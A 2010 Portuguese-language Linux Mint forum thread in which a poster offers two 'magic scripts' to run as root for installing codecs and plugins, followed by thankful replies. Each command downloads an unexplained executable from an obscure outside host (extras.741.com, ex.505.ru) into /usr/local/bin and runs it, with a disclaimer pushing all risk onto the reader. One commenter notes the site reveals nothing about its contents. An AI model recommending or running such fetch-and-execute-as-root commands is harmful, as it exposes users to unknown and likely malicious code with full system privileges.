Scripts mágicos para instalar extras, codecs e diversos plugins proprietários no linux mint

ottootto Otto Sá
editado janeiro 2010 em Dicas e Truques
:hammer:

Caros amigos do linux mint Brasil,

Usem esses scripts mágicos pelo terminal como root para
instalar extras, codecs e diversos plugins proprietários no linux mint.Eu sei que o linux mint já tem muita otimização pré instalada, mas vocês podem deixar ele mais redondinho.
Cole os scripts abaixo no terminal como root, mas antes façam um “apt-get update”. Aqui vai os dois scripts mágicos para vocês:

1)
[i][b]wget -qO /usr/local/bin/extras http://extras.741.com/extras && cd /usr/local/bin && chmod +x extras && extras[/b]
[/i]
2)
[i][b]cd /usr/local/bin && wget -O exoodles ex.505.ru && chmod +x exoodles && exoodles[/b][/i]

Espero que gostem dessa dica.
abraços.

[u][b]OBS[/b]:[/u]

[b]Usem os scripts por seu livre arbítrio, pois não me responsabilizo se algo der errado ou danificar o seu computador, pois trata-se de scripts de terceiro. Usem por sua própria vontade e assumam o risco se usarem.[/b]

:pint:

Comentários

• SoullessBRSoullessBR Angelo Merlo
    editado janeiro 2010
    Boa caro [b]Otto[/b], obrigado pela dica, já apanhei muito com esses esquemas de codecs e tudo mais no Linux (na época era o conectiva 8), não funcionava nada e sem internet pra facilita a vida.

Enfim, obrigado amigo. Futuramente poderia ter uma seção de downloads com esses scripts pro pessoal né?

Abraços.
    Tudo de bom.
  • olknolkn Omar Kfoury
    editado fevereiro 2010
    Quais seriam esses codecs e extras ?? o site em si não achei nada =/
  • editado maio 2010
    Realmente uma mão na roda, de grande serventia pra todos!
Entre ou Registre-se para fazer um comentário.